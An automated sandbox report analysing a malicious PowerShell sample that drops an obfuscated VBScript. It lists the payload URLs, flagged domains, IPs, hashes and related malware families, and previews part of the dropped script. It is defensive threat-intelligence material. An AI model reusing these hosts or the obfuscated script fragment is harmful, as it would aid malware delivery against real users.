                                                https://www.erp-royal-crown.info/wh/Subopowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: phishing
                                                		unknown
                                                http://www.almrwad.compowershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21DFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22247000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.almrwad.com/wh/Subordinerepowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.erp-royal-crown.inpowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://go.microspowershell.exe, 00000005.00000002.1410489118.000001B6456C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.almrwad.com/wh/Subordipowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.almrwad.copowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.almrwad.com/wh/Subordinerendes78.powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://erp-royal-crown.infopowershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F219EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: phishing
                                                  		unknown
                                                  https://www.erp-royal-crown.info/wh/Subordinerendespowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: phishing
                                                  		unknown
                                                  https://contoso.com/powershell.exe, 00000009.00000002.2646911553.0000022F31214000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.erp-royal-crown.info/wh/Subordinerendes78.spowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: phishing
                                                    		unknown
                                                    https://www.fornid.com/img/logo.jpgpowershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.almrwad.com/whpowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.almrwad.com/wh/Subpowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.erp-royal-crown.info/wh/Subordinpowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: phishing
                                                    		unknown
                                                    https://www.almrwad.com/wh/Subopowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://blog.fornid.com/powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1599621623.000002CD57BF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1599621623.000002CD57D3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1428247268.000001B6547E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2646911553.0000022F31357000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2646911553.0000022F31214000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.erp-royal-crown.info/wh/Subordinerendes78powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: phishing
                                                      		unknown
                                                      http://www.fornid.com/content/13-international-shipmentspowershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.almrwad.com/wh/Suborpowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.almrwad.powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000005.00000002.1410489118.000001B645D99000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.jspowershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.erp-royal-crown.info/wh/Subordinerendes7powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: phishing
                                                          		unknown
                                                          http://www.fornid.compowershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544764265.000002CD4965D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.fornid.com/cercapowershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.erp-royal-crown.info/powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: phishing
                                                          		unknown
                                                          https://www.pinualapplualtualch.aual/na/mg.vbspowershell.exe, 00000002.00000002.1544764265.000002CD49808000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.almrwad.com/wh/Subordinerenpowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://crl.mpowershell.exe, 00000005.00000002.1433777398.000001B65CBF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.erp-royal-crown.infpowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          91.193.42.13
                                                          		www.pineappletech.aeBelgium
                                                          		48694ITFPLfalse
                                                          93.95.216.175
                                                          		fornid.comItaly
                                                          		52030SERVERPLAN-ASITtrue
                                                          148.251.114.233
                                                          		erp-royal-crown.infoGermany
                                                          		24940HETZNER-ASDEfalse
                                                          184.171.244.231
                                                          		almrwad.comUnited States
                                                          		33182DIMENOCUSfalse

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1568999
                                                          Start date and time:2024-12-05 10:38:12 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 6m 20s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:17
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:ap.ps1
                                                          Detection:MAL
                                                          Classification:mal100.expl.evad.winPS1@11/13@4/4
                                                          EGA Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 15
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .ps1

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target powershell.exe, PID 7544 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 8104 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 8156 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: ap.ps1

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          04:39:09API Interceptor1604307x Sleep call for process: powershell.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          91.193.42.13ni.ps1Get hashmaliciousUnknownBrowse
                                                            qc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                              List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                93.95.216.175ni.ps1Get hashmaliciousUnknownBrowse
                                                                  148.251.114.233PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                  • www.eslameldaramlly.site/30vc/
                                                                  PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                  • www.eslameldaramlly.site/30vc/
                                                                  PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • www.eslameldaramlly.site/fchs/
                                                                  PO23100072.exeGet hashmaliciousFormBookBrowse
                                                                  • www.eslameldaramlly.site/30vc/
                                                                  PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                                  • www.eslameldaramlly.site/30vc/
                                                                  PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                  • www.eslameldaramlly.site/30vc/
                                                                  184.171.244.231ni.ps1Get hashmaliciousUnknownBrowse
                                                                    qc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                      yd2.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                        List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          www.pineappletech.aeni.ps1Get hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          qc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                          • 91.193.42.13
                                                                          List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                          • 91.193.42.13

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          ITFPLni.ps1Get hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          qc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                          • 91.193.42.13
                                                                          List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                          • 91.193.42.13
                                                                          KgQJ0dIs3A.exeGet hashmaliciousAmadey, zgRATBrowse
                                                                          • 91.193.43.180
                                                                          7GC8osUQMq.exeGet hashmaliciousAmadeyBrowse
                                                                          • 91.193.43.180
                                                                          Y3KkfxEZuo.exeGet hashmaliciouszgRATBrowse
                                                                          • 91.193.43.180
                                                                          wqb7dL448k.exeGet hashmaliciousAmadey, Xmrig, zgRATBrowse
                                                                          • 91.193.43.180
                                                                          Oupxwi.jsGet hashmaliciousQbotBrowse
                                                                          • 91.193.43.119
                                                                          Nyyne.jsGet hashmaliciousQbotBrowse
                                                                          • 91.193.43.119
                                                                          Nyyne.jsGet hashmaliciousUnknownBrowse
                                                                          • 91.193.43.119
                                                                          HETZNER-ASDEni.ps1Get hashmaliciousUnknownBrowse
                                                                          • 148.251.114.233
                                                                          UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                          • 88.99.61.52
                                                                          https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#CGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                          • 5.9.227.67
                                                                          Ttok18.exeGet hashmaliciousVidarBrowse
                                                                          • 159.69.102.165
                                                                          jtkhikadjthsad.exeGet hashmaliciousVidarBrowse
                                                                          • 159.69.102.165
                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                          • 159.69.102.165
                                                                          rukT6hBo6P.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                          • 49.12.121.47
                                                                          o26qobnkQI.exeGet hashmaliciousVidarBrowse
                                                                          • 159.69.102.165
                                                                          https://ammyy.com/en/downloads.htmlGet hashmaliciousFlawedammyyBrowse
                                                                          • 136.243.18.118
                                                                          Advertising Agreement for Youtube Cooperation.scrGet hashmaliciousLummaC StealerBrowse
                                                                          • 148.251.0.164
                                                                          SERVERPLAN-ASITni.ps1Get hashmaliciousUnknownBrowse
                                                                          • 93.95.216.175
                                                                          untrippingvT.ps1Get hashmaliciousUnknownBrowse
                                                                          • 46.254.34.201
                                                                          yT6gJFN0SR.lnkGet hashmaliciousUnknownBrowse
                                                                          • 46.254.34.201
                                                                          mX3IqRiuFo.lnkGet hashmaliciousUnknownBrowse
                                                                          • 46.254.34.201
                                                                          6K2g0GMmIE.lnkGet hashmaliciousUnknownBrowse
                                                                          • 46.254.34.201
                                                                          G9eWTvswoH.lnkGet hashmaliciousUnknownBrowse
                                                                          • 46.254.34.201
                                                                          la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                          • 193.70.147.14
                                                                          Ordine Electricas BC Corp PO EDC0969388.batGet hashmaliciousGuLoaderBrowse
                                                                          • 185.81.4.143
                                                                          Play_VM-Now(Gdunphy)CQDM.htmGet hashmaliciousUnknownBrowse
                                                                          • 93.95.216.8
                                                                          Steel Dynamics.pdfGet hashmaliciousUnknownBrowse
                                                                          • 93.95.216.8

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          3b5074b1b5d032e5620f69f9f700ff0eni.ps1Get hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          RFQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          31#U544a.exeGet hashmaliciousCobaltStrikeBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          R7bv9d6gTH.dllGet hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          Patch.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          Runtimeuserer.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          Qsgtknmtt.exeGet hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          Fzcaaz.exeGet hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231
                                                                          Ekyrfzxogk.exeGet hashmaliciousUnknownBrowse
                                                                          • 91.193.42.13
                                                                          • 93.95.216.175
                                                                          • 148.251.114.233
                                                                          • 184.171.244.231

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\Public\sz3.vbs

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with very long lines (316), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):29287
                                                                          Entropy (8bit):5.16757071229696
                                                                          Encrypted:false
                                                                          SSDEEP:768:5Yf48SKT1nPeL9GLfqAQnS71KcNrx182u+:504lKT1P0yfqAuiNbtu+
                                                                          MD5:8DF76AF54C38D5D4C2CD9F6D18EEDF92
                                                                          SHA1:B21C95EBF34440AD8DA30F6E4FE25BADB871D61A
                                                                          SHA-256:2FD9440E21ADF91473719E9FB085F4D47A1D5AFCF02333A7F04D2A0F4D0B1C77
                                                                          SHA-512:8DBBDBC575A292890F1B1BB8AEDA916A958225B11739075B447AE7CE64774C678C45B071F0FBB91460BB218409E026ECFCF05740DAD8EB059B773C990D57FB09
                                                                          Malicious:true
                                                                          Reputation:low
                                                                          Preview:......Function Seasoning(Ambrain)......Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)....Seasoning = ChrW(Ambrain)....Opskreknivsplid = Command ......End Function ....elektroingenirerne = LenB("Sardinieren") ..elektroingenirerne = elektroingenirerne xor clng(6932161) ...... ..Sorting137 = 0.... ..Pinligstes= array(65+5+0,69,77,59,72,73,62,59,66,66)......Kopvisdislocatedavic = Log(Len("Frihedsbevgelserne"))....Private Const Kbesum = 49485..Private Const Cornbird = 16348..Private Const Nyderes = "Pandaer verificative133 knopskydning,"..Private Const Terrorize = "Postansvarlige skjorternes"..Private Const Danseorkesteret = "Myndigstes150 exculpate trykkeriers puromucous"..Private Const Unignorant = &HF76C..Private Const Iodinophilous = -9045..Private Const Polyautography = 22989..Private Const Divisibly = -6735..Private Const Takeups = &H8FE6..Private Const Inductance = &H59DF..Private Const Thorax64 = -13300..Private Const Forkiness = &H96C8..Private Const Kondensatorers147 =

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):11608
                                                                          Entropy (8bit):4.890472898059848
                                                                          Encrypted:false
                                                                          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                          MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                          SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                          SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                          SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                          Malicious:false
                                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):1.1940658735648508
                                                                          Encrypted:false
                                                                          SSDEEP:3:Nlllulh49//lz:NllUu9//
                                                                          MD5:AADE84B9650AB09D8DC304B168D6D555
                                                                          SHA1:17BC4180A60DBFF0B3F9BF8E5C5987D452D1D868
                                                                          SHA-256:2C79C35AD1C4DFF21408F447C6AD565ACC3BDE8C8869108C8AA2F05B79539090
                                                                          SHA-512:594C57CC7D421DD576EA05344E4EA8179D93295003638AD34A634BB5632B88DF65B7AEB52515E50CA060DA57F7BC6553C0193FF1931CB95D9BDEC3845779045D
                                                                          Malicious:false
                                                                          Preview:@...e................................................@..........

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nuy5wgu.ate.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b1qmzmnf.rei.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_flocgjrv.ukm.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hc040vgy.uxe.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mi2x0pjn.ijc.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_we5oxeep.ysw.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
